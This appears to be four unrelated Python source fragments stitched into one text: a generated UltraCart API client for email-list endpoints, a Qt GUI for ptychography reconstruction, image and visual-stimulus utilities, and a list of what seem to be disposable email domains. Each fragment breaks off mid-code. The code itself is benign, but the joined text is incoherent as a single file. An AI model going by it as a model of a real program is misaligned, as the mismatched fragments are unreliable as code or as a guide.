raise ValueError("Missing the required parameter `storefront_oid` when calling `get_email_list_segment_folder`") # noqa: E501
# verify the required parameter 'email_list_segment_folder_uuid' is set
if ('email_list_segment_folder_uuid' not in params or
params['email_list_segment_folder_uuid'] is None):
raise ValueError("Missing the required parameter `email_list_segment_folder_uuid` when calling `get_email_list_segment_folder`") # noqa: E501
collection_formats = {}
path_params = {}
if 'storefront_oid' in params:
path_params['storefront_oid'] = params['storefront_oid'] # noqa: E501
if 'email_list_segment_folder_uuid' in params:
path_params['email_list_segment_folder_uuid'] = params['email_list_segment_folder_uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartBrowserApiKey', 'ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/storefront/{storefront_oid}/email/list_segment_folders/{email_list_segment_folder_uuid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailListSegmentFolderResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_email_list_segment_folders(self, storefront_oid, **kwargs): # noqa: E501
"""Get email campaign folders # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_list_segment_folders(storefront_oid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int storefront_oid: (required)
:return: EmailListSegmentFoldersResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_email_list_segment_folders_with_http_info(storefront_oid, **kwargs) # noqa: E501
else:
(data) = self.get_email_list_segment_folders_with_http_info(storefront_oid, **kwargs) # noqa: E501
return data
def get_email_list_segment_folders_with_http_info(self, storefront_oid, **kwargs): # noqa: E501
"""Get email campaign folders # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_list_segment_folders_with_http_info(storefront_oid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int storefront_oid: (required)
:return: EmailListSegmentFoldersResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['storefront_oid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_email_list_segment_folders" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'storefront_oid' is set
if ('storefront_oid' not in params or
params['storefront_oid'] is None):
raise ValueError("Missing the required parameter `storefront_oid` when calling `get_email_list_segment_folders`") # noqa: E501
collection_formats = {}
path_params = {}
if 'storefront_oid' in params:
path_params['storefront_oid'] = params['storefront_oid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartBrowserApiKey', 'ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/storefront/{storefront_oid}/email/list_segment_folders', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailListSegmentFoldersResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_email_lists(self, storefront_oid, **kwargs): # noqa: E501
"""Get email lists # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_lists(storefront_oid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int storefront_oid: (required)
:return: EmailListsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_email_lists_with_http_info(storefront_oid, **kwargs) # noqa: E501
else:
(data) = self.get_email_lists_with_http_info(storefront_oid, **kwargs) # noqa: E501
return data
def get_email_lists_with_http_info(self, storefront_oid, **kwargs): # noqa: E501
"""Get email lists # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_lists_with_http_info(storefront_oid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int storefront_oid: (required)
:return: EmailListsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['storefront_oid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_email_lists" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'storefront_oid' is set
if ('storefront_oid' not in params or
params['storefront_oid'] is None):
raise ValueError("Missing the required parameter `storefront_oid` when calling `get_email_lists`") # noqa: E501
collection_formats = {}
path_params = {}
if 'storefront_oid' in params:
path_params['storefront_oid'] = params['storefront_oid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP | |
# init reconStepWindow
if self.ck_preview_flag.isChecked():
if self.param.mode_flag:
info = (self.param.obj_mode_num, self.param.prb_mode_num, 1)
elif self.param.multislice_flag:
info = (self.param.slice_num, 1, 1)
else:
info = (1, 1, 2)
if self.reconStepWindow is None:
self.reconStepWindow = ReconStepWindow(*info)
self.reconStepWindow.reset_window(*info, iterations=self.param.n_iterations,
slider_interval=self.param.display_interval)
self.reconStepWindow.show()
else:
if self.reconStepWindow is not None:
# TODO: maybe a thorough cleanup???
self.reconStepWindow.close()
if not _TEST:
thread = self._ptycho_gpu_thread = PtychoReconWorker(self.param, parent=self)
else:
thread = self._ptycho_gpu_thread = PtychoReconFakeWorker(self.param, parent=self)
thread.update_signal.connect(self.update_recon_step)
thread.finished.connect(self.resetButtons)
if batch_mode:
thread.finished.connect(self._batch_manager)
#thread.finished.connect(self.reconStepWindow.debug)
thread.start()
self.btn_recon_stop.setEnabled(True)
self.btn_recon_start.setEnabled(False)
# init scan window
# TODO: optimize and refactor this part
if self.ck_scan_pt_flag.isChecked():
if self.scanWindow is None:
self.scanWindow = ScanWindow()
self.scanWindow.reset_window()
self.scanWindow.show()
else:
if self.scanWindow is not None:
self.scanWindow.close()
self.scanWindow = None
return
if self._scan_points is None:
raise RuntimeError("Scan points were not read. This shouldn't happen. Abort.")
else:
self._scan_points[0] *= -1.*self.param.x_direction
self._scan_points[1] *= self.param.y_direction
# borrowed from nsls2ptycho/core/ptycho_recon.py
if self.param.mpi_file_path == '':
if self.param.gpu_flag:
num_processes = str(len(self.param.gpus))
else:
num_processes = str(self.param.processes) if self.param.processes > 1 else str(1)
else:
# regardless if GPU is used or not --- trust users to know this
num_processes = str(get_mpi_num_processes(self.param.mpi_file_path))
self.scanWindow.update_image(self._scan_points, int(num_processes))
def stop(self, batch_mode=False):
if self._ptycho_gpu_thread is not None:
if batch_mode:
self._ptycho_gpu_thread.finished.disconnect(self._batch_manager)
if self._ptycho_gpu_thread.isRunning():
self._ptycho_gpu_thread.kill() # first kill the mpi processes
self._ptycho_gpu_thread.quit() # then quit QThread gracefully
self._ptycho_gpu_thread = None
self.resetButtons()
if self.reconStepWindow is not None:
self.reconStepWindow.reset_window()
if self.scanWindow is not None:
self.scanWindow.reset_window()
def init_mmap(self):
p = self.param
datasize = 8 if p.precision == 'single' else 16
datatype = np.complex64 if p.precision == 'single' else np.complex128
global mm_list, shm_list
for i, name in enumerate(["/"+p.shm_name+"_obj_size", "/"+p.shm_name+"_prb", "/"+p.shm_name+"_obj"]):
shm_list.append(SharedMemory(name))
mm_list.append(mmap.mmap(shm_list[i].fd, shm_list[i].size))
nx_obj = int.from_bytes(mm_list[0].read(8), byteorder='big')
ny_obj = int.from_bytes(mm_list[0].read(8), byteorder='big') # the file position has been moved by 8 bytes when we get nx_obj
if p.mode_flag:
self._prb = np.ndarray(shape=(p.n_iterations, p.prb_mode_num, p.nx, p.ny), dtype=datatype, buffer=mm_list[1], order='C')
self._obj = np.ndarray(shape=(p.n_iterations, p.obj_mode_num, nx_obj, ny_obj), dtype=datatype, buffer=mm_list[2], order='C')
elif p.multislice_flag:
self._prb = np.ndarray(shape=(p.n_iterations, 1, p.nx, p.ny), dtype=datatype, buffer=mm_list[1], order='C')
self._obj = np.ndarray(shape=(p.n_iterations, p.slice_num, nx_obj, ny_obj), dtype=datatype, buffer=mm_list[2], order='C')
else:
self._prb = np.ndarray(shape=(p.n_iterations, 1, p.nx, p.ny), dtype=datatype, buffer=mm_list[1], order='C')
self._obj = np.ndarray(shape=(p.n_iterations, 1, nx_obj, ny_obj), dtype=datatype, buffer=mm_list[2], order='C')
def close_mmap(self):
# We close shared memory as long as the backend is terminated either normally or
# abnormally. The subtlety here is that the monitor should still be able to access
# the intermediate results after mmaps' are closed. A potential segfault is avoided
# by accessing the transformed results, which are buffered, not the original ones.
try:
global mm_list, shm_list
for mm, shm in zip(mm_list, shm_list):
mm.close()
shm.close_fd()
shm.unlink()
mm_list = []
shm_list = []
except NameError:
# either not using GUI, monitor is turned off, global variables are deleted or not yet created!
# need to examine the last case
try:
SharedMemory("/"+self.param.shm_name+"_obj_size").unlink()
SharedMemory("/"+self.param.shm_name+"_prb").unlink()
SharedMemory("/"+self.param.shm_name+"_obj").unlink()
except ExistentialError:
pass # nothing to clean up, we're done
def update_recon_step(self, it, data=None):
self.recon_bar.setValue(it)
if self.reconStepWindow is not None:
self.reconStepWindow.update_iter(it)
if not _TEST and self.ck_preview_flag.isChecked():
try:
if it == -1 and data == 'init_mmap':
try:
# the two npy are created by ptycho by this time
self.init_mmap()
except ExistentialError:
# user may kill the process prematurely
self.stop()
elif it == self.param.n_iterations+1:
# reserve it=n_iterations+1 as the working space
self.reconStepWindow.current_max_iters = self.param.n_iterations
p = self.param
if not p.postprocessing_flag:
return
work_dir = p.working_directory
scan_num = str(p.scan_num)
data_dir = work_dir+'/recon_result/S'+scan_num+'/'+p.sign+'/recon_data/'
data = {}
images = []
print("[SUCCESS] generated results are loaded in the preview window. ", end='', file=sys.stderr)
print("Slide to frame "+str(p.n_iterations+1)+" and select from drop-down menus.", file=sys.stderr)
if self.param.mode_flag:
# load data that has been averaged + orthonormalized + phase-ramp removed
for i in range(self.param.obj_mode_num):
data['obj_'+str(i)] = np.load(data_dir+'recon_'+scan_num+'_'+p.sign+'_' \
+'object_mode_orth_ave_rp_mode_'+str(i)+'.npy')
self.reconStepWindow.cb_image_object.addItem("Object "+str(i)+" (orth_ave_rp)")
# hard-wire the padding values here...
images.append( np.rot90(np.angle(data['obj_'+str(i)][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
images.append( np.rot90(np.abs(data['obj_'+str(i)][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
for i in range(self.param.prb_mode_num):
data['prb_'+str(i)] = np.load(data_dir+'recon_'+scan_num+'_'+p.sign+'_' \
+'probe_mode_orth_ave_rp_mode_'+str(i)+'.npy')
self.reconStepWindow.cb_image_probe.addItem("Probe "+str(i)+" (orth_ave_rp)")
images.append( np.rot90(np.abs(data['prb_'+str(i)])) )
images.append( np.rot90(np.angle(data['prb_'+str(i)])) )
elif self.param.multislice_flag:
# load data that has been averaged + phase-ramp removed
for i in range(self.param.slice_num):
data['obj_'+str(i)] = np.load(data_dir+'recon_'+scan_num+'_'+p.sign+'_' \
+'object_ave_rp_ms_'+str(i)+'.npy')
self.reconStepWindow.cb_image_object.addItem("Object "+str(i)+" (ave_rp)")
# hard-wire the padding values here...
images.append( np.rot90(np.angle(data['obj_'+str(i)][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
images.append( np.rot90(np.abs(data['obj_'+str(i)][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
for i in range(self.param.slice_num):
data['prb_'+str(i)] = np.load(data_dir+'recon_'+scan_num+'_'+p.sign+'_' \
+'probe_ave_rp_ms_'+str(i)+'.npy')
self.reconStepWindow.cb_image_probe.addItem("Probe "+str(i)+" (ave_rp)")
images.append( np.rot90(np.abs(data['prb_'+str(i)])) )
images.append( np.rot90(np.angle(data['prb_'+str(i)])) )
else:
# load data (ave & ave_rp)
for sol in ['ave', 'ave_rp']:
for tar, target in zip(['obj', 'prb'], ['object', 'probe']):
data[tar+'_'+sol] = np.load(data_dir+'recon_'+scan_num+'_'+p.sign+'_'+target+'_'+sol+'.npy')
# calculate images
for sol in ['ave', 'ave_rp']:
self.reconStepWindow.cb_image_object.addItem("Object ("+sol+")")
# hard-wire the padding values here...
images.append( np.rot90(np.angle(data['obj_'+sol][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
images.append( np.rot90(np.abs(data['obj_'+sol][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
for sol in ['ave', 'ave_rp']:
self.reconStepWindow.cb_image_probe.addItem("Probe ("+sol+")")
images.append( np.rot90(np.abs(data['prb_'+sol])) )
images.append( np.rot90(np.angle(data['prb_'+sol])) )
self.reconStepWindow.update_images(it, images)
elif (it-1) % self.param.display_interval == 0:
if self.param.mode_flag:
images = []
for i in range(self.param.obj_mode_num):
images.append(np.rot90(np.angle(self._obj[it-1, i])))
images.append(np.rot90(np.abs(self._obj[it-1, i])))
for i in range(self.param.prb_mode_num):
images.append(np.rot90(np.abs(self._prb[it-1, i])))
images.append(np.rot90(np.angle(self._prb[it-1, i])))
elif self.param.multislice_flag:
images = []
for i in range(self.param.slice_num):
images.append(np.rot90(np.angle(self._obj[it-1, i])))
images.append(np.rot90(np.abs(self._obj[it-1, i])))
#TODO: decide which probe we'd like to present
images.append(np.rot90(np.abs(self._prb[it-1, 0])))
images.append(np.rot90(np.angle(self._prb[it-1, 0])))
else:
images = [np.rot90(np.angle(self._obj[it-1, 0])),
np.rot90(np.abs(self._obj[it-1, 0] )),
np.rot90(np.abs(self._prb[it-1, 0] )),
np.rot90(np.angle(self._prb[it-1, 0]))]
self.reconStepWindow.update_images(it, images)
self.reconStepWindow.update_metric(it, data)
except TypeError as ex: # when MPI processes are terminated, _prb and _obj are deleted and so not subscriptable
pass
else:
# -------------------- Sungsoo version -------------------------------------
# a list of random images for test
# in the order of [object_amplitude, object_phase, probe_amplitude, probe_phase]
images = [np.random.random((128,128)) for _ in range(4)]
self.reconStepWindow.update_images(it, images)
self.reconStepWindow.update_metric(it, data)
def loadProbe(self):
filename, _ = QFileDialog.getOpenFileName(self, 'Open probe file', directory=self.param.working_directory, filter="(*.npy)")
if filename is not None and len(filename) > 0:
prb_filename = os.path.basename(filename)
prb_dir = filename[:(len(filename)-len(prb_filename))]
self.param.set_prb_path(prb_dir, prb_filename)
self.le_prb_path.setText(prb_filename)
self.ck_init_prb_flag.setChecked(False)
def resetProbeFlg(self):
# called when "estimate from data" is clicked
self.param.set_prb_path('', '')
self.le_prb_path.setText('')
self.ck_init_prb_flag.setChecked(True)
def loadObject(self):
filename, _ = QFileDialog.getOpenFileName(self, 'Open object file', directory=self.param.working_directory, filter="(*.npy)")
if filename is not None and len(filename) > 0:
obj_filename = os.path.basename(filename)
obj_dir = filename[:(len(filename)-len(obj_filename))]
self.param.set_obj_path(obj_dir, obj_filename)
self.le_obj_path.setText(obj_filename)
self.ck_init_obj_flag.setChecked(False)
def resetObjectFlg(self):
# called when "random start" is clicked
self.param.set_obj_path('', '')
self.le_obj_path.setText('')
self.ck_init_obj_flag.setChecked(True)
def setWorkingDirectory(self):
dirname = QFileDialog.getExistingDirectory(self, 'Choose working folder', directory=os.path.expanduser("~"))
if dirname is not None and len(dirname) > 0:
dirname = dirname + "/"
self.param.set_working_directory(dirname)
self.le_working_directory.setText(dirname)
def updateExtraScansFlg(self):
self.btn_set_extra_scans.setEnabled(self.ck_extra_scans_flag.isChecked())
def setExtraScans(self):
if self._extra_scans_dialog is None:
self._extra_scans_dialog = ListWidget()
self._extra_scans_dialog.setWindowTitle('Set associated scan numbers')
# read from param if there are any asso scans leftover from last time
p = self.param
if len(p.asso_scan_numbers) > 0:
scans = self._extra_scans_dialog.listWidget
scans.addItems([str(item) for item in p.asso_scan_numbers])
self._extra_scans_dialog.show()
def modeMultiSliceGuard(self):
'''
Currently our ptycho code does not support simultaneous mode + multi-slice reconstruction.
This function can be removed once the support is added.
'''
if self.ck_mode_flag.isChecked() and self.ck_multislice_flag.isChecked():
message = "Currently our ptycho code does not support simultaneous multi-mode + multi-slice reconstruction."
print("[WARNING] " + message, file=sys.stderr)
QtWidgets.QMessageBox.warning(self, "Warning", message)
self.ck_mode_flag.setChecked(False)
self.ck_multislice_flag.setChecked(False)
self.updateModeFlg()
self.updateMultiSliceFlg()
def updateModeFlg(self):
mode_flag = self.ck_mode_flag.isChecked()
self.sp_prb_mode_num.setEnabled(mode_flag)
self.sp_obj_mode_num.setEnabled(mode_flag)
self.param.mode_flag = mode_flag
def updateMultiSliceFlg(self):
flag = self.ck_multislice_flag.isChecked()
self.sp_slice_num.setEnabled(flag)
self.sp_slice_spacing_m.setEnabled(flag)
self.param.multislice_flag = flag
def updateObjMaskFlg(self):
mask_flag = self.ck_mask_obj_flag.isChecked()
self.sp_amp_min.setEnabled(mask_flag)
self.sp_amp_max.setEnabled(mask_flag)
self.sp_pha_min.setEnabled(mask_flag)
self.sp_pha_max.setEnabled(mask_flag)
self.param.mask_obj_flag = mask_flag
def checkGpuAvail(self):
try:
import cupy
except ImportError:
print('[!] Unable to import CuPy. GPU reconstruction is disabled.')
print('[!] (Either CuPy is not installed, or GPU is not available.)')
self.ck_gpu_flag.setChecked(False)
self.ck_gpu_flag.setEnabled(False)
self.param.gpu_flag = False
self.le_gpus.setText('')
self.le_gpus.setEnabled(False)
self.cb_gpu_batch_size.setEnabled(False)
else:
del cupy
def updateGpuFlg(self):
flag = self.ck_gpu_flag.isChecked()
self.le_gpus.setEnabled(flag)
self.rb_nccl.setEnabled(flag)
if not flag and self.rb_nccl.isChecked():
self.rb_mpi.setChecked(True)
def updateBraggFlg(self):
flag = self.ck_bragg_flag.isChecked()
self.sp_bragg_theta.setEnabled(flag)
self.sp_bragg_gamma.setEnabled(flag)
self.sp_bragg_delta.setEnabled(flag)
self.param.bragg_flag = flag
def updatePcFlg(self):
flag = self.ck_pc_flag.isChecked()
self.sp_pc_sigma.setEnabled(flag)
self.sp_pc_kernel_n.setEnabled(flag)
self.cb_pc_alg.setEnabled(flag)
self.param.pc_flag = flag
def updateCorrFlg(self):
flag = self.ck_position_correction_flag.isChecked()
self.sp_position_correction_start.setEnabled(flag)
self.sp_position_correction_step.setEnabled(flag)
self.param.position_correction_flag = flag
def updateRefineDataFlg(self):
flag = self.ck_refine_data_flag.isChecked()
self.sp_refine_data_start_it.setEnabled(flag)
self.sp_refine_data_interval.setEnabled(flag)
self.sp_refine_data_step.setEnabled(flag)
self.param.refine_data_flag = flag
def updateBatchCropDataFlg(self):
if self.cb_dataloader.currentText() != "Load from databroker":
flag = False
self.ck_batch_crop_flag.setChecked(flag)
self.ck_batch_crop_flag.setEnabled(flag)
else:
flag = self.ck_batch_crop_flag.isChecked()
self.ck_batch_crop_flag.setEnabled(True)
self.sp_batch_x0.setEnabled(flag)
self.sp_batch_y0.setEnabled(flag)
self.sp_batch_width.setEnabled(flag)
self.sp_batch_height.setEnabled(flag)
def showNoPostProcessingWarning(self):
if not self.ck_postprocessing_flag.isChecked():
print("[WARNING] Post-processing is turned off. No result will be written to disk!", file=sys.stderr)
def clearSharedMemory(self):
message = "Are you sure you want to clear the shared memory segments currently left in /dev/shm? "\
"The safest way to do so is to ensure you have only one window (that is, this one) opened on this machine."
ans | |
<filename>sfp/utils.py<gh_stars>1-10
#!/usr/bin/python
"""various utils
"""
import os
import numpy as np
import matplotlib.pyplot as plt
import scipy as sp
from . import stimuli as sfp_stimuli
from bids import BIDSLayout
import pandas as pd
from . import first_level_analysis
from . import tuning_curves
import warnings
from . import plotting
def bytescale(data, cmin=None, cmax=None, high=255, low=0):
"""
Byte scales an array (image).
Byte scaling means converting the input image to uint8 dtype and scaling
the range to ``(low, high)`` (default 0-255).
If the input image already has dtype uint8, no scaling is done.
This is copied from scipy.misc, where it is deprecated
Parameters
----------
data : ndarray
PIL image data array.
cmin : scalar, optional
Bias scaling of small values. Default is ``data.min()``.
cmax : scalar, optional
Bias scaling of large values. Default is ``data.max()``.
high : scalar, optional
Scale max value to `high`. Default is 255.
low : scalar, optional
Scale min value to `low`. Default is 0.
Returns
-------
img_array : uint8 ndarray
The byte-scaled array.
Examples
--------
>>> import numpy as np
>>> from sfp.utils import bytescale
>>> img = np.array([[ 91.06794177, 3.39058326, 84.4221549 ],
... [ 73.88003259, 80.91433048, 4.88878881],
... [ 51.53875334, 34.45808177, 27.5873488 ]])
>>> bytescale(img)
array([[255, 0, 236],
[205, 225, 4],
[140, 90, 70]], dtype=uint8)
>>> bytescale(img, high=200, low=100)
array([[200, 100, 192],
[180, 188, 102],
[155, 135, 128]], dtype=uint8)
>>> bytescale(img, cmin=0, cmax=255)
array([[91, 3, 84],
[74, 81, 5],
[52, 34, 28]], dtype=uint8)
"""
if data.dtype == np.uint8:
return data
if high > 255:
raise ValueError("`high` should be less than or equal to 255.")
if low < 0:
raise ValueError("`low` should be greater than or equal to 0.")
if high < low:
raise ValueError("`high` should be greater than or equal to `low`.")
if cmin is None:
cmin = data.min()
if cmax is None:
cmax = data.max()
cscale = cmax - cmin
if cscale < 0:
raise ValueError("`cmax` should be larger than `cmin`.")
elif cscale == 0:
cscale = 1
scale = float(high - low) / cscale
bytedata = (data - cmin) * scale + low
return (bytedata.clip(low, high) + 0.5).astype(np.uint8)
def scatter_heat(x, y, c, **kwargs):
plt.scatter(x, y, c=c, cmap='RdBu_r', s=50, norm=plotting.MidpointNormalize(midpoint=0),
vmin=kwargs['vmin'], vmax=kwargs['vmax'])
def create_sin_cpp(size, w_x, w_y, phase=0, origin=None):
"""create a full 2d sine wave, with frequency in cycles / pixel
"""
if origin is None:
origin = [(size+1) / 2., (size+1) / 2.]
x = np.array(range(1, size+1))
x, y = np.meshgrid(x - origin[0], x - origin[1])
return np.cos(2*np.pi*x*w_x + 2*np.pi*y*w_y + phase)
def create_sin_cpd(size, w_x_cpd, w_y_cpd, phase=0, stim_rad_deg=12):
"""create a full 2d sine wave, with frequency in cycles / degree
this converts the desired cycles / degree into the frequency shown in an image by using the
stim_rad_deg, the radius of the image in degrees of visual angle.
"""
w_x_pix = w_x_cpd / (size / (2*float(stim_rad_deg)))
w_y_pix = w_y_cpd / (size / (2*float(stim_rad_deg)))
return create_sin_cpp(size, w_x_pix, w_y_pix, phase)
def create_circle_mask(x, y, rad, size):
"""create a circular mask
this returns a circular mask centered at pixel (x, y) with radius rad in a size by size
image. This can then be multiplied by an image of the same size to mask out everything else.
"""
x_grid = np.array(range(size))
x_grid, y_grid = np.meshgrid(x_grid, x_grid)
mask = np.zeros((size, size))
mask[(x_grid - x)**2 + (y_grid - y)**2 <= rad**2] = 1
return mask
def create_ecc_mask(ecc_range, size, max_visual_angle):
"""Create mask selecting range of eccentricities.
Note this only works for square images.
Parameters
----------
ecc_range : tuple
2-tuple of floats specifying the eccentricity of the internal and
external edges (in that order) of this mask, in degrees.
size : int
Height/width of the mask, in pixels.
max_visual_angle : float
Height/width of the mask, in degrees.
Returns
-------
mask : np.ndarray
2d boolean array containing the mask for this eccentricity range.
"""
if ecc_range[0] >= ecc_range[1]:
raise Exception("ecc_range[1] must be strictly greater than ecc_range[0]!")
ppd = float(size) / max_visual_angle
origin = ((size+1) / 2., (size+1) / 2.)
min_mask = create_circle_mask(*origin, ecc_range[0]*ppd, size)
max_mask = create_circle_mask(*origin, ecc_range[1]*ppd, size)
return np.logical_and(max_mask.astype(bool), ~min_mask.astype(bool))
def create_prf_loc_map(size=1080, max_visual_angle=24, origin=None):
"""Create map of pRF locations
Default parameters are for the set up used in this experiment
Parameters
----------
size : int, optional
Size of the arrays, in pixels. Returned arrays will be 2d, with this
number of pixels on each dimension.
max_visual_angle : float, optional
Diameter of the array, in degrees. Used to convert from pixels to
degrees.
origin : tuple or None, optional
The location of the origin of the image. If None, will place in the
center.
Returns
-------
eccen, angle : np.ndarray
The eccentricity and polar angle, at each pixel.
"""
assert not hasattr(size, '__iter__'), "Only square images permitted, size must be a scalar!"
size = int(size)
if origin is None:
origin = ((size+1) / 2., (size+1) / 2.)
x, y = np.meshgrid(np.arange(1, size+1) - origin[0],
np.arange(1, size+1) - origin[1])
eccen = np.sqrt(x**2 + y**2)
angle = np.mod(np.arctan2(y, x), 2*np.pi)
return eccen, angle
def mask_array_like_grating(masked, array_to_mask, mid_val=128, val_to_set=0):
"""mask array_to_mask the way that masked has been masked
this takes two square arrays, grating and array_to_mask. masked should already be masked into
an annulus, while array_to_mask should be unmasked. This then finds the inner and outer radii
of that annulus and applies the same mask to array_to_mask. the value in the masked part of
masked should be mid_val (by default, 128, as you'd get when the grating runs from 0 to 255;
mid_val=0, with the grating going from -1 to 1 is also likely) and the value that you want to
set array_to_mask to is val_to_set (same reasonable values as mid_val)
"""
R = sfp_stimuli.mkR(masked.shape) / float(masked.shape[0])
R_masking = sfp_stimuli.mkR(array_to_mask.shape) / float(array_to_mask.shape[0])
x, y = np.where(masked != mid_val)
Rmin = R[x, y].min()
try:
array_to_mask[R_masking < Rmin] = val_to_set
except IndexError:
# then there is no R<Rmin
pass
Rmax = R[x, y].max()
try:
array_to_mask[R_masking > Rmax] = val_to_set
except IndexError:
# then there is no R>Rmax
pass
return array_to_mask
def flat_hyperbola(x, a):
"""hyperbola which is flat until 1 degree
"""
b = 1.
period = x*a
period[x < b] = a*b
return 1./period
def fit_log_norm(x, y, **kwargs):
"""fit log norm to data and plot the result
to be used with seaborn.FacetGrid.map_dataframe
x: string, column in data which contains the x values for this plot.
y: string, column in data which contains the y values for this plot.
kwargs must contain `data`, the DataFrame with data to plot.
"""
data = kwargs.pop('data')
plot_data = data.groupby(x)[y].mean()
try:
popt, pcov = sp.optimize.curve_fit(tuning_curves.log_norm_pdf, plot_data.index,
plot_data.values)
except RuntimeError:
# since data is a Series, this is the best way to do this.
idx = [i for i in data.iloc[0].index if i not in [x, y]]
warnings.warn("The following was not well fit by a log Gaussian and so is"
" skipped:\n%s" % data.iloc[0][idx])
else:
plt.plot(plot_data.index, tuning_curves.log_norm_pdf(plot_data.index, *popt), **kwargs)
def fit_log_norm_ci(x, y, ci_vals=[2.5, 97.5], **kwargs):
"""fit log norm to different bootstraps and plot the resulting mean and confidence interval.
to be used with seaborn.FacetGrid.map_dataframe.
because this goes through all the bootstraps and calculates their log normal tuning curves
separately, it's takes much more time than fit_log_norm
the data passed here must contain a column named `bootstrap_num`, which specifies which number
bootstrap the observation corresponds to. Each value of bootstrap_num will be fit
separately. It's recommended (i.e., this function was written assuming), therefore, that your
data only contains one y value per value of bootstrap_num and value of x.
x: string, column in data which contains the x values for this plot.
y: string, column in data which contains the x values for this plot.
ci_vals: 2-tuple or list of length 2 of floats, optional. the min and max percentile you wish
to plot as a shaded region. For example, if you wish to plot the 95% confidence interval, then
ci_vals=[2.5, 97.5] (the default); if you wish to plot the 68%, then ci_vals=[16, 84].
kwargs must contain `data`, the DataFrame with data to plot.
"""
data = kwargs.pop('data')
if 'color' in | |
"ayizkufailhjr.cf",
"ayizkufailhjr.ga",
"ayizkufailhjr.gq",
"ayizkufailhjr.ml",
"ayizkufailhjr.tk",
"ayuh.myvnc.com",
"azamat-farisovich.ru",
"azazazatashkent.tk",
"azcomputerworks.<EMAIL>",
"azest.us",
"azmeil.tk",
"azote.cf",
"azote.ga",
"azote.gq",
"azure.cloudns.asia",
"azxhzkohzjwvt6lcx.cf",
"azxhzkohzjwvt6lcx.ga",
"azxhzkohzjwvt6lcx.gq",
"azxhzkohzjwvt6lcx.ml",
"azxhzkohzjwvt6lcx.tk",
"b-sky-b.cf",
"b-sky-b.ga",
"b-sky-b.gq",
"b-sky-b.ml",
"b-sky-b.tk",
"b.cr.cloudns.asia",
"b.kerl.gq",
"b.reed.to",
"b.royal-syrup.tk",
"b1gmail.epicgamer.org",
"b1of96u.com",
"b1p5xtrngklaukff.cf",
"b1p5xtrngklaukff.ga",
"b1p5xtrngklaukff.gq",
"b1p5xtrngklaukff.tk",
"b2bx.net",
"b2email.win",
"b2g6anmfxkt2t.cf",
"b2g6anmfxkt2t.ga",
"b2g6anmfxkt2t.gq",
"b2g6anmfxkt2t.ml",
"b2g6anmfxkt2t.tk",
"b3nxdx6dhq.cf",
"b3nxdx6dhq.ga",
"b3nxdx6dhq.gq",
"b3nxdx6dhq.ml",
"b55b56.cf",
"b55b56.ga",
"b55b56.gq",
"b55b56.ml",
"b55b56.tk",
"b5safaria.com",
"b6o7vt32yz.cf",
"b6o7vt32yz.ga",
"b6o7vt32yz.gq",
"b6o7vt32yz.ml",
"b6o7vt32yz.tk",
